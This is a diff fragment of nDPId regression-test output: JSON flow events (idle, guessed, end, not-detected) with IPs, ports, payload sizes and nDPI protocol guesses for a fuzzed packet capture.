-00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854565449,"flow_last_seen":1031854565449,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.148.5","src_port":80,"dst_port":2608,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1031854565447,"flow_last_seen":1031854565700,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":708,"flow_tot_l4_payload_len":708,"flow_avg_l4_payload_len":177,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2608,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854546078,"flow_last_seen":1031854546078,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2639,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854546078,"flow_last_seen":1031854546078,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2639,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854525904,"flow_last_seen":1031854525904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"68.37.115.0","src_port":2603,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854525904,"flow_last_seen":1031854525904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"68.37.115.0","src_port":2603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854495447,"flow_last_seen":1031854495447,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.21.3.13","src_port":2602,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854495447,"flow_last_seen":1031854495447,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.21.3.13","src_port":2602,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00669{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489031,"flow_last_seen":1031854489031,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.57.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00595{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489031,"flow_last_seen":1031854489031,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.57.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00599{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562321,"flow_last_seen":1031854562321,"flow_idle_time":7440000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":9587,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535022,"flow_last_seen":1031854535022,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.76.5","src_port":80,"dst_port":65069,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535022,"flow_last_seen":1031854535022,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.76.5","src_port":80,"dst_port":65069,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854546079,"flow_last_seen":1031854546079,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.52.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2093,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854546079,"flow_last_seen":1031854546079,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.52.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2093,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00615{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854543322,"flow_last_seen":1031854543322,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"170.170.170.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00600{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854543322,"flow_last_seen":1031854543322,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"170.170.170.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854488668,"flow_last_seen":1031854488668,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"0.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2601,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854488668,"flow_last_seen":1031854488668,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"0.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00668{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489131,"flow_last_seen":1031854489131,"flow_idle_time":7560000,"flow_min_l4_payload_len":427,"flow_max_l4_payload_len":427,"flow_tot_l4_payload_len":427,"flow_avg_l4_payload_len":427,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.6.3.5","dst_ip":"172.20.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489131,"flow_last_seen":1031854489131,"flow_idle_time":7560000,"flow_min_l4_payload_len":427,"flow_max_l4_payload_len":427,"flow_tot_l4_payload_len":427,"flow_avg_l4_payload_len":427,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.6.3.5","dst_ip":"172.20.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00679{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562489,"flow_last_seen":1031854562489,"flow_idle_time":7560000,"flow_min_l4_payload_len":800,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":800,"flow_avg_l4_payload_len":800,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.70.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.Cloudflare","breed":"Acceptable","category":"Web"},"http": {}} +00596{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562489,"flow_last_seen":1031854562489,"flow_idle_time":7560000,"flow_min_l4_payload_len":800,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":800,"flow_avg_l4_payload_len":800,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.70.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00668{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535090,"flow_last_seen":1031854535090,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"44.20.3.5","src_port":80,"dst_port":2605,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535090,"flow_last_seen":1031854535090,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"44.20.3.5","src_port":80,"dst_port":2605,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535021,"flow_last_seen":1031854535021,"flow_idle_time":7560000,"flow_min_l4_payload_len":423,"flow_max_l4_payload_len":423,"flow_tot_l4_payload_len":423,"flow_avg_l4_payload_len":423,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"51.20.3.5","dst_ip":"172.20.3.13","src_port":2605,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {}} +00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535021,"flow_last_seen":1031854535021,"flow_idle_time":7560000,"flow_min_l4_payload_len":423,"flow_max_l4_payload_len":423,"flow_tot_l4_payload_len":423,"flow_avg_l4_payload_len":423,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"51.20.3.5","dst_ip":"172.20.3.13","src_port":2605,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854525903,"flow_last_seen":1031854525903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"72.20.3.13","src_port":2603,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854525903,"flow_last_seen":1031854525903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"72.20.3.13","src_port":2603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1031854484481,"flow_last_seen":1031854484482,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2600,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1031854484481,"flow_last_seen":1031854484482,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2600,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854499919,"flow_last_seen":1031854499919,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.88","dst_ip":"172.20.3.82","src_port":80,"dst_port":2601,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854499919,"flow_last_seen":1031854499919,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.88","dst_ip":"172.20.3.82","src_port":80,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1031854488666,"flow_last_seen":1031854499919,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5827,"flow_avg_l4_payload_len":529,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1031854495447,"flow_last_seen":1031854506544,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":708,"flow_tot_l4_payload_len":1195,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2602,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854488668,"flow_last_seen":1031854488668,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":81,"dst_port":2601,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854488668,"flow_last_seen":1031854488668,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":81,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854525903,"flow_last_seen":1031854525903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.82.5","src_port":80,"dst_port":2603,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854525903,"flow_last_seen":1031854525903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.82.5","src_port":80,"dst_port":2603,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854514843,"flow_last_seen":1031854514843,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.77","src_port":2603,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854514843,"flow_last_seen":1031854514843,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.77","src_port":2603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1031854514843,"flow_last_seen":1031854525904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2603,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00591{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1031854514843,"flow_last_seen":1031854525904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854532143,"flow_last_seen":1031854532143,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.68.5","src_port":80,"dst_port":2604,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 